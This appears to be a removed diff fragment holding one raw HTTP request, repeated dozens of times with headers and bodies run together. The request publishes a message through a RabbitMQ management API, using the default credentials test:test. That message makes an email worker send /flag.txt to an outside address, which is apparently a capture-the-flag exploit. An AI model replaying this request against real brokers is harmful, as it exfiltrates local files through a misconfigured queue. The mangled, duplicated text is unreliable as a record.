-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
